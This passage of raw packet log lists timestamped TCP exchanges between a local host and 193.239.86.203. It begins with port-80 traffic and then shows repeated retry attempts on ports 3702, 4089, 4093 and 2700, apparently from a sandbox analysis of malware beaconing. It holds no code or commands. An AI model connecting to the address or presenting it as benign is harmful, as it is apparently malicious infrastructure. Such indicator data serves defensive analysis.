                        Apr 25, 2024 21:36:48.995666981 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.995704889 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.995714903 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.995738983 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.995775938 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.995964050 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.996015072 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.996032953 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.996068001 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.996120930 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.996871948 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.996936083 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.996956110 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.996990919 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.997011900 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.997795105 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.997874022 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.997884989 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.997920036 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.997940063 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.998091936 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.998145103 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.998203039 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.998258114 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.998374939 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.998424053 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.998461008 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.998497009 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.998523951 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.998744965 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.998800039 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.998821020 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.998861074 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.998874903 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.998902082 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.998918056 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.998949051 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.998961926 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.999007940 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.999057055 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.999089956 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.999106884 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.999193907 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.999248981 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.999362946 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.999413967 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.999541998 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.999583006 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.999634027 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.999634981 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.999644041 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.999700069 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.999767065 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.999835014 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:48.999881983 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:48.999933958 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000014067 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000053883 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000070095 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000134945 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000138044 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000180006 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000201941 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000217915 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000221968 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000257015 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000273943 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000310898 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000332117 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000365973 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000386953 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000550032 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000606060 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000622988 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000674963 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000694990 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000734091 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000747919 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000785112 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000808001 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000845909 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000861883 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000896931 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.000936031 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000973940 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.000989914 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001080036 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001084089 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001120090 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001132965 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001161098 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001174927 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001204014 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001231909 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001241922 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001255989 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001281023 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001291990 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001319885 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001332998 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001358032 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001374960 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001399040 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001419067 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001437902 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001455069 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001477003 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001490116 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001516104 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001530886 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001555920 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001571894 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001595974 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001607895 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001637936 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001651049 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001677036 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001683950 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001713991 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001732111 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001754045 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001768112 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001792908 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001807928 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001832008 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001842022 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001869917 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001878977 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001908064 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001924038 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001943111 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.001960039 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.001981974 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002021074 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002034903 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002059937 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002074957 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002099991 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002115965 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002140045 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002151966 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002180099 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002193928 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002233982 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002254009 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002306938 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002357960 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002415895 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002429962 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002469063 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002484083 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002526045 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002540112 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002578020 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002584934 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002625942 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002650023 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002702951 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002753973 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002793074 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002809048 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002850056 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002898932 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002938986 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002960920 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.002978086 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.002985954 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003016949 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003031969 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003056049 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003073931 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003094912 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003109932 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003134012 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003150940 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003175974 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003187895 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003222942 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003248930 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003282070 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003298044 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003390074 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003427982 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003437042 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003479958 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003501892 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003540039 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003554106 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003576994 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003587961 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003617048 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003627062 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003654957 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003669024 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003695965 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003707886 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003748894 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003768921 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003808975 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003833055 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003845930 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003854990 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003885984 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003890038 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003923893 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003938913 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.003964901 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.003977060 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004012108 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004036903 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004084110 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004133940 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004173040 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004183054 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004210949 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004230022 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004251003 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004259109 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004291058 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004298925 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004328966 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004334927 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004375935 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004404068 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004442930 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004453897 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004482031 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004493952 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004520893 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004528999 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004560947 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004571915 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004600048 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004612923 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004640102 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004647970 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004679918 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004693985 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004718065 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004729033 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004756927 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004771948 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004796028 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004812002 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004829884 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004854918 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004868984 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004911900 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004928112 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004956961 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.004981995 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.004992008 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.005006075 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.005012035 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.005029917 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.005037069 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.005053043 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.005054951 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.005072117 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.005093098 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.005104065 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.005122900 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.005150080 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.005168915 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.005218983 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.005234957 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.005268097 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.005523920 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.005558014 CEST8049735193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:49.005575895 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:49.005615950 CEST4973580192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:51.657743931 CEST497363702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:51.968688011 CEST370249736193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:52.480518103 CEST497363702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:52.791435957 CEST370249736193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:53.308617115 CEST497363702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:53.619673014 CEST370249736193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:54.121134043 CEST497363702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:54.432153940 CEST370249736193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:54.933614016 CEST497363702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:55.244522095 CEST370249736193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:55.245976925 CEST497384089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:55.561155081 CEST408949738193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:56.074242115 CEST497384089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:56.389208078 CEST408949738193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:56.902400017 CEST497384089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:57.217466116 CEST408949738193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:57.777364016 CEST497384089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:58.092783928 CEST408949738193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:58.777388096 CEST497384089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:59.092420101 CEST408949738193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:59.093852997 CEST497394093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:36:59.404936075 CEST409349739193.239.86.203192.168.2.4
                        Apr 25, 2024 21:36:59.980535030 CEST497394093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:00.291771889 CEST409349739193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:00.793032885 CEST497394093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:01.104062080 CEST409349739193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:01.605515003 CEST497394093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:01.916457891 CEST409349739193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:02.420609951 CEST497394093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:02.731599092 CEST409349739193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:02.732846975 CEST497402700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:03.040018082 CEST270049740193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:03.543219090 CEST497402700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:03.850140095 CEST270049740193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:04.355539083 CEST497402700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:04.662631035 CEST270049740193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:05.168024063 CEST497402700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:05.474872112 CEST270049740193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:05.980542898 CEST497402700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:06.287874937 CEST270049740193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:07.294682980 CEST497413702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:07.606388092 CEST370249741193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:08.121140003 CEST497413702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:08.433052063 CEST370249741193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:08.949294090 CEST497413702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:09.261126041 CEST370249741193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:09.761759996 CEST497413702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:10.073520899 CEST370249741193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:10.574358940 CEST497413702192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:10.886764050 CEST370249741193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:10.888611078 CEST497424089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:11.200284004 CEST408949742193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:11.714890003 CEST497424089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:12.026801109 CEST408949742193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:12.527518988 CEST497424089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:12.839139938 CEST408949742193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:13.340145111 CEST497424089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:13.651932955 CEST408949742193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:14.152398109 CEST497424089192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:14.464304924 CEST408949742193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:14.466233969 CEST497434093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:14.777812958 CEST409349743193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:15.293036938 CEST497434093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:15.607398987 CEST409349743193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:16.121186018 CEST497434093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:16.433048964 CEST409349743193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:16.933649063 CEST497434093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:17.245426893 CEST409349743193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:17.746301889 CEST497434093192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:18.058068037 CEST409349743193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:18.060117960 CEST497442700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:18.376573086 CEST270049744193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:18.886848927 CEST497442700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:19.203519106 CEST270049744193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:19.714941978 CEST497442700192.168.2.4193.239.86.203
                        Apr 25, 2024 21:37:20.031402111 CEST270049744193.239.86.203192.168.2.4
                        Apr 25, 2024 21:37:20.543029070 CEST497442700192.168.2.4193.239.86.203
